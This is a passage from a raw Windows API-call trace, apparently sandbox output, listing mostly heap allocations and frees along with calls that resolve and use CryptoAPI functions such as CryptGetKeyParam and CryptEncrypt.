(HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0118.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0118.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0118.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0118.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0118.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0118.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0118.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0118.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0118.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0118.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0118.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0118.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0118.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0118.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0118.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0118.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0118.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0118.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0118.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0118.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0118.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0118.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0118.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0118.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0118.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0118.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0118.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0118.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0118.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0118.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797048 [0118.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2bd8 [0118.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0118.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0118.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0118.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0118.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0118.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0118.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0118.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0118.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0118.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0118.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0118.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0118.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0118.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b48 [0118.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0118.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0118.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0118.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0118.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0118.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0118.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0118.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0118.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0118.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0118.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0118.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0118.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0118.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0118.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0118.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0118.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0118.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0118.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0118.526] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0118.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0118.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0118.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0118.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0118.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0118.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0118.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0118.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0118.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0118.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0118.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0118.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0118.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0118.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0118.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0118.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0118.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0118.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0118.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0118.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0118.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0118.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0118.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0118.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0118.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0118.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0118.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0118.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0118.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0118.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0118.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0118.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0118.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0118.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0118.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0118.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0118.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0118.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0118.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0118.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0118.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0118.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0118.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0118.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0118.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0118.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0118.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0118.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0118.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0118.528] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0118.528] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796ec8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0118.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0118.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0118.529] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0118.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0118.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0118.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0118.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0118.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0118.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0118.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0118.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0118.529] CryptGetKeyParam (in: hKey=0x41ac100, dwParam=0x7, pbData=0x43e27d0, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e27d0*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0118.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0118.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0118.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0118.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0118.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0118.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0118.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0118.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0118.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0118.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0118.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0118.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0118.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0118.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0118.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0118.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0118.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0118.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0118.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0118.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0118.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0118.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0118.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0118.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0118.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0118.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0118.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0118.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0118.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0118.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0118.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0118.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0118.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0118.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0118.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0118.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0118.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0118.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0118.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0118.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0118.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0118.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0118.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0118.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0118.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0118.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0118.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0118.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0118.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0118.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0118.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0118.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0118.531] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0118.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0118.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea490 | out: hHeap=0x1780000) returned 1 [0118.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0118.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0118.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0118.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0118.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9128 | out: hHeap=0x1780000) returned 1 [0118.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0118.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0118.531] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0118.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0118.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0118.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0118.531] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0118.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0118.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0118.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0118.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0118.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0118.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0118.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0118.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0118.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0118.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e27e8 | out: hHeap=0x1780000) returned 1 [0118.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0118.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0118.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0118.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0118.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0118.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0118.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0118.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0118.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0118.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0118.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0118.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0118.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0118.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0118.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0118.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0118.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0118.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0118.532] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0118.532] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0118.532] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0118.532] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.533] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.533] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0118.533] WideCharToMultiByte (in: CodePage=0x0, 